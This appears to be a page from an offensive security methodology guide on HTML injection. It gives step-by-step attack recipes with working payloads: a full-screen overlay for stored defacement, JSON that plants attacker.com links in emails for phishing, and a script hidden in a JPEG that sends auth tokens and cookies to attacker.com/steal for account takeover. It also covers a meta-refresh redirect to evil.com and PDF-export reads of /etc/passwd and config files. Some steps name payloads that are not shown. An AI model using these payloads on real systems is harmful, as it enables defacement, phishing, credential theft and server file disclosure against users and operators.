search

HTML Injection

hashtag
Check List

hashtag
Methodology

hashtag
Black Box

hashtag
Stored

1

Go to any page that has a user-editable rich text field ticket or description, comment, bio

2

Enter normal text like test <b>bold</b> test and submit

3

View the saved content with another user or in private mode, if bold renders as bold text, limited HTML is allowed

4

Intercept the save/create request with Burp Suite and send to Repeater

5

In the parameter that contains the user input and replace the value with this breakout + overlay payload

"><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div>
6

If ظthe input is already inside a tag wrapped in <p> use this version

</p><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div><p>
7

Send the request and let the content be saved

8

Log in as a different user or open incognito/private window and visit any page that displays the saved content dashboard, ticket list, profile page, forum thread,

9

If the entire screen becomes completely black and nothing is clickable Full visual defacement via Stored HTML Injection with style attribute is confirmed

10

Works on every platform that uses whitelist-based HTML Sanitization and allows the <style> attribute on <div>, <h1>, <b>, <i>, <a>,

hashtag
Email HTML Injection

1

Go to any property valuation, booking request, or contact form that sends user input to an email template

2

Fill the form normally (especially the address or street, city field and intercept the POST request with Burp Suite

3

Send the request to Repeater

4

In the JSON body, locate the address-related fields commonly street, formattedAddress, address, location, city

5

Replace the street or formattedAddress value with your attacker-controlled URL For Example

"street": "https://attacker.com",
"formattedAddress": "https://attacker.com"
6

Full example payload works on any similar endpoint

{
  "address": {
    "street": "https://attacker.com",
    "formattedAddress": "https://attacker.com",
    "city": "Click here for your free valuation",
    "postalCode": "https://attacker.com"
  },
  "email": "victim@company.com",
  "name": "Please click the link below"
}
7

Send the request – it will succeed (no 403 if the field is not validated)

8

Wait for the confirmation or booking email to be sent to the admin/agent/staff

9

When the victim (employee) opens the email, the address field will be rendered as a clickable link pointing to https://attacker.com

10

If the victim clicks it Successful Email Template Content Spoofing Phishing via Trusted Domain confirmed

hashtag
Email Invite Manipulation

1

Log in to your account on target.com

2

Navigate to your project settings page

3

Change your project name to a payload such as

<img src="https://miro.app.com/v2/resize:fit:720/format:webp/0*y2OAF_DSarBAjihO.jpg">
4

Go to the Invite Members section and send an email invitation to any email address you control

5

Open the received email

6

You will notice that the HTML image is rendered inline in the email body, proving successful injection

hashtag
Account Takeover

1

Go to your profile/shop bio or any field that allows limited HTML

2

Enter this exact HTML structure and save it

<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/your_image_id?options[delivery_type]=upload">Next page →</a>
</div>
</div>
3

Upload any valid image to the site (via avatar, product image, shop banner anywhere that uses Cloudinary

4

After upload, grab the image ID from the final URL usually looks like s--AbCdEfGh--/v1234567890/image_name.jpg → your_image_id = s--AbCdEfGh--)

5

Replace your_image_id in the href above with your real Cloudinary image ID

6

Use a hex editor (https://hexed.it or local tool) to open your original image file

7

Go to offset 0x1A (or any safe location after JPEG headers) and insert your XSS payload exactly like this

<script>fetch('https://attacker.com/steal?token='+localStorage.getItem('auth_token')+'&cookie='+document.cookie)</script>Save the modified image as new file (still valid JPEG)
8

Save the modified image as new file (still valid JPEG)

9

Update your bio HTML with the new image ID and exact parameteroptions[delivery_type]=upload

10

Final working bio payload

<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/s--NewMaliciousID--/?options[delivery_type]=upload">Next →</a>
</div>
</div>
11

Save the bio and Now go to any victim's shop page or wait for anyone to view your shop/profile

12

When they click the "Next page →" link → jQuery replaceWith() loads your raw image bytes via same-origin → your embedded executes → localStorage token + cookies stolen → Account Takeover achieved

hashtag
Send Message Functionality HTML Injection to Server Side Request Forgery

1

Log into the target site and check if there is a point in the application that sends a message to another user or as an email, and find the Send Message functionality or Email Form

2

Enter a normal email like test@example.com and submit the form

3

Intercept the POST request with Burp Suite and send to Repeater

4

In the email parameter, replace the value with this exact payload

5

Send the request and check if the alert pops or if the script renders

6

If no alert but the field allows injection without @ symbol, try a basic HTML breakout

7

Send and refresh the page or view as another user and if Hello renders, HTML Injection confirmed Then escalate with an external image load

8

If the image loads from third-party, SSRF potential confirmed

9

Then use Burp Collaborator for IP exfiltration

10

Submit and check Burp Collaborator for HTTP/DNS interactions,if callback received, SSRF + CSRF via IP leak confirmed

11

Test the email parameter on other input endpoints like /contact, /feedback, /reset, /signup, or /profile as they often reflect input without @ validation

hashtag
Server File Reading via PDF Export

1

Go to any file upload feature that supports PDF export like reports, invoices, profiles, documents, attachments

2

Upload a normal file with a safe name like test.pdf

3

Trigger PDF generation and download the file, open it to confirm filename appears inside

4

Intercept the upload POST request with Burp Suite and send to Repeater

5

In the filename parameter replace the value with this HTML breakout payload

6

Send the request and generate a new PDF

7

Open the PDF, if <h1>XSS Test</h1> renders As large text, HTML Injection into PDF template confirmed

8

Then escalate with this JavaScript LFI payload (works in wkhtmltopdf, Chrome PDF, etc.)

9

Or for Windows servers

10

Generate the PDF again and open it, If /etc/passwd or system.ini contents are printed inside the PDF, Critical Local File Inclusion (LFI) via PDF HTML Injection confirmed

11

Then read other sensitive files

  • file:///etc/hosts

  • file:///proc/version

  • file:///var/www/html/config.php

hashtag
HTML injection in search UI

1

Log in to the application using a low-privilege user account

2

Access the "Contacts" section and initiate the creation of a new Circle

3

When naming the Circle, insert the following payload:

<meta http-equiv="refresh" content="2; https://evil.com/" />

4

Share the Circle with a user account having an "Admin" role

5

Observe that the browser will redirect to a malicious website within a 2-second timeframe

hashtag
White Box

hashtag
Cheat Sheet

PreviousJavaScript ExecutionNextClient Side URL Redirect

Last updated